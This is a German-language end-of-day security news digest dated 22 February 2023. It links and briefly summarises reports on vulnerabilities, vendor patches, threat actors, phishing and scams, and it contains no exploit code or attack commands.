Tageszusammenfassung - 22.02.2023

End-of-Day report

Timeframe: Dienstag 21-02-2023 18:00 - Mittwoch 22-02-2023 18:00 Handler: Michael Schlagenhaufer Co-Handler: Stephan Richter

News

Warnung vor Angriffen auf IBM Aspera Faspex und Mitel MiVoice

Die US-IT-Sicherheitsbehörde CISA warnt davor, dass Cyberkriminelle Sicherheitslücken in IBM Aspera Faspex und Mitel MiVoice angreifen. Updates stehen bereit.

https://heise.de/-7523870


Jetzt patchen! Exploit-Code für kritische Fortinet FortiNAC-Lücke in Umlauf

Da Exploit-Code veröffentlicht wurde, könnten Angreifer Fortinets Netzwerk-Zugangskontrolllösung FortiNAC ins Visier nehmen.

https://heise.de/-7523427


Fake Give-Aways und Geschenkaktionen im Namen von -MrBeast-!

Wer sich regelmäßig YouTube-Videos ansieht, kommt kaum an MrBeast vorbei. Der Youtuber mit über 134 Millionen Abonnent:innen ist für seine Give-Away-Videos bekannt, bei denen er Tausende oder gar Millionen von Dollar verschenkt. Diesen Ruf machen sich auch Kriminelle zunutze, indem sie betrügerische Gewinnversprechen und Geschenkaktionen im Namen von MrBeast verbreiten.

https://www.watchlist-internet.at/news/fake-give-aways-und-geschenkaktionen-im-namen-von-mrbeast/


Hydrochasma hackers target medical research labs, shipping firms

A previously unknown threat actor named Hydrochasma has been targeting shipping and medical laboratories involved in COVID-19 vaccine development and treatments.

https://www.bleepingcomputer.com/news/security/hydrochasma-hackers-target-medical-research-labs-shipping-firms/


WhatsApp ignoriert seit Jahren ein Sicherheitsproblem, das alle betrifft

Fremde können das eigene Profil übernehmen und sich für euch ausgeben - ganz ohne Hacking oder Phishing.

https://futurezone.at/apps/whatsapp-sicherheit-problem-konto-telefonnummer-recycelt-fremde-account/402337845


Attackers Abuse Cron Jobs to Reinfect Websites

Malicious cron jobs are nothing new; we-ve seen attackers use them quite frequently to reinfect websites. However, in recent months we-ve noticed a distinctive new wave of these infections that appears to be closely related to this article about a backdoor that we-ve been tracking.

https://blog.sucuri.net/2023/02/attackers-abuse-cron-jobs-to-reinfect-websites.html


Threat Actors Adopt Havoc Framework for Post-Exploitation in Targeted Attacks

An open source command-and-control (C2) framework known as Havoc is being adopted by threat actors as an alternative to other well-known legitimate toolkits like Cobalt Strike, Sliver, and Brute Ratel. Cybersecurity firm Zscaler said it observed a new campaign in the beginning of January 2023 targeting an unnamed government organization that utilized Havoc.

https://thehackernews.com/2023/02/threat-actors-adopt-havoc-framework-for.html


Lets build a Chrome extension that steals everything

Manifest v3 may have taken some of the juice out of browser extensions, but I think there is still plenty left in the tank. To prove it, let-s build a Chrome extension that steals as much data as possible.

https://mattfrisbie.substack.com/p/spy-chrome-extension


How NPM Packages Were Used to Spread Phishing Links

[...] On Monday, 20th of February, Checkmarx Labs discovered an anomaly in the NPM ecosystem when we cross-referenced new information with our databases. Clusters of packages had been published in large quantities to the NPM package manager. Further investigation revealed that the packages were part of a trending new attack vector, with attackers spamming the open-source ecosystem with packages containing links to phishing campaigns.

https://checkmarx.com/blog/how-npm-packages-were-used-to-spread-phishing-links/


Android voice chat app with 5m installs leaked user chats

The voice chat app under discussion is OyeTalk, which is available for Android and iOS devices and is operated from Pakistan.

https://www.hackread.com/android-voice-chat-app-data-leak/

Vulnerabilities

Sicherheitsupdates: VMware dichtet kritisches Sicherheitsleck ab

VMware schließt mit Updates für Carbon Black App Control und vRealize sowie Cloud Foundation eine kritische und eine hochriskante Schwachstelle.

https://heise.de/-7523335


Foxit PDF-Updates dichten hochriskante Schwachstellen ab

In der PDF-Software Foxit klafften Sicherheitslücken, durch die Angreifer etwa mit manipulierten PDF-Dateien Schadcode einschleusen und ausführen hätten können.

https://heise.de/-7523313


Multiple vulnerabilities in Nokia BTS Airscale ASIKA [PDF]

Synacktiv performed an audit on the base transceiver station Nokia Airscale ASIKA, running the firmware version btsmed_5G19B_GNB_0007_001836_000863, and discovered multiple vulnerabilities.

https://www.synacktiv.com/sites/default/files/2023-02/Synacktiv-Nokia-BTS-AirScale-Asika-Multiple-Vulnerabilities.pdf


Security updates for Wednesday

Security updates have been issued by Debian (amanda, apr-util, and tiff), Fedora (apptainer, git, gssntlmssp, OpenImageIO, openssl, webkit2gtk3, xorg-x11-server, and xorg-x11-server-Xwayland), Oracle (firefox and thunderbird), Red Hat (python3), SUSE (gnutls, php7, and python-Django), and Ubuntu (chromium-browser, libxpm, and mariadb-10.3, mariadb-10.6).

https://lwn.net/Articles/924070/


Synology-SA-23:01 ClamAV

Multiple vulnerabilities allow remote attackers to possibly execute arbitrary code or local users to obtain sensitive information via a susceptible version of Antivirus Essential, Synology Mail Server, and Synology MailPlus Server.

https://www.synology.com/en-global/support/security/Synology_SA_23_01


IBM Security Bulletins 2023-02-22

* A vulnerability in IBM Java affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products * A vulnerability in the GUI affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products * BM Sterling B2B Integrator is vulnerable to cross-site scripting (CVE-2022-43578) * IBM Sterling Global Mailbox is vulnerable to arbitrary code execution due to Apache Commons Collections [CVE-2015-6420, CVE-2017-15708] * IBM WebSphere Application Server, which is bundled with IBM Cloud Pak for Applications, is vulnerable to a remote code execution vulnerability (CVE-2023-23477) * IBM WebSphere Application Server, which is bundled with IBM WebSphere Hybrid Edition, is vulnerable to a remote code execution vulnerability (CVE-2023-23477) * Multiple vulnerabilities in the Linux kernel affect IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products * SNMPv3 server credentials are exposed in log files in IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products * The dasboard UI of IBM Sterling B2B Integrator is vulnerable to improper permission control (CVE-2022-40231) * Vulnerabilities in jsonwebtoken affects IBM Watson Assistant for IBM Cloud Pak for Data * Vulnerability in Apache Tomcat affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products * Vulnerability in IBM WebSphere Application Server Liberty may affect IBM Spectrum Protect Plus (CVE-2019-11777) * Vulnerability in Log4j affects IBM Integrated Analytics System [CVE-2022-23305]

https://www.ibm.com/support/pages/bulletin/


Cisco Nexus 9000 Series Fabric Switches in ACI Mode Link Layer Discovery Protocol Memory Leak Denial of Service Vulnerability

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-aci-lldp-dos-ySCNZOpX


Cisco FXOS Software and UCS Manager Software Configuration Backup Static Key Vulnerability

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ucsm-bkpsky-H8FCQgsA


Cisco NX-OS Software SSH X.509v3 Certificate Authentication with Unsupported Remote Authorization Method Privilege Escalation Issues

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-x509v3-unsupportedconfig-ScRtAbUk


Cisco NX-OS Software CLI Command Injection Vulnerability

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-cli-cmdinject-euQVK9u


Cisco Firepower 4100 Series, Firepower 9300 Security Appliances, and UCS Fabric Interconnects Command Injection Vulnerability

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxfp-cmdinj-XXBZjtR


Cisco Nexus 9300-FX3 Series Fabric Extender for UCS Fabric Interconnects Authentication Bypass Vulnerability

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-elyfex-dos-gfvcByx


Cisco Application Policy Infrastructure Controller and Cisco Cloud Network Controller Cross-Site Request Forgery Vulnerability

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-capic-csrfv-DMx6KSwV


[R1] Stand-alone Security Patch Available for Tenable.sc versions 5.22.0 to 6.0.0: SC-202302.2

https://www.tenable.com/security/tns-2023-06


[R1] Stand-alone Security Patch Available for Tenable.sc versions 5.22.0 to 5.23.1: SC-202302.3

https://www.tenable.com/security/tns-2023-05